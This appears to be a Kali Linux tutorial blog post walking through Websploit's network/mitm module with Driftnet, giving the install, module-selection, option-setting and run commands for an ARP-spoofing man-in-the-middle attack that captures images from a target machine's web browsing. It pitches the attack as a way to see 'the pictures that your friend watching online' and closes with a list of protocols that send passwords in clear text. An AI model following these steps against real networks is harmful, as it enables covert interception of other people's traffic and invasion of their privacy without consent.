Hacking, Hacking Tools, Vulnerability

Driftnet – Tool used to Capture Images that Your Friend looking Online

Driftnet

How we can launch an MITM attack with Websploit and the Driftnet – Tool used to capture images.

MITM attack is a type of cyber attack where the attacker intercepts communication between two parties.

Step1: Need to install websploit in kali if not present.

[email protected]:~# apt-get install websploit

Step2: To Run the websploit

[email protected]:~# websploit

Step3: Next we need to list the modules with the websploit.

wsf > show modules

Driftnet - Tool used to capture images

Step4: Need to select network/mitm under Network modules.

wsf > use network/mitm
wsf:MITM > show options

Driftnet - Tool used to capture images

Interface: Need to specify network adapter interface based on our network adapter.

  • set Interface eth0
  • set Interface wlan0

Router: Need to specify Router IP, can be found with the command route -n.

set Router (Gateway IP)

Target: Victim machine IP address, can be found with ipconfig for windows and ifconfig for Linux.

Driftnet - Tool used to capture images

Step5: All set now time to run the sniffer, once you run the sniffer IP Forwarding and ARP Spoofing occurs after that sniffers will startup.

wsf:MITM > run

Driftnet - Tool used to capture images

Step6: Now go down to victim machine and start surfing, all the images would be captured by drifnet.

Driftnet - Tool used to capture images

Here you can find the pictures that your friend watching online.

  • HTTP: Sends passwords in clear text
  • TELNET: Transfer commands in plain text
  • SNMP: Sends passwords in clear text
  • POP: Sends passwords in clear text
  • FTP: Sends passwords in clear text
  • NNTP: Sends passwords in clear text
  • IMAP: Sends passwords in clear text

If you any doubt please don’t hesitate to leave a comment.

Also, find more Tutorials with kali Linux

Source : GBHackers

Previous ArticleNext Article
Send this to a friend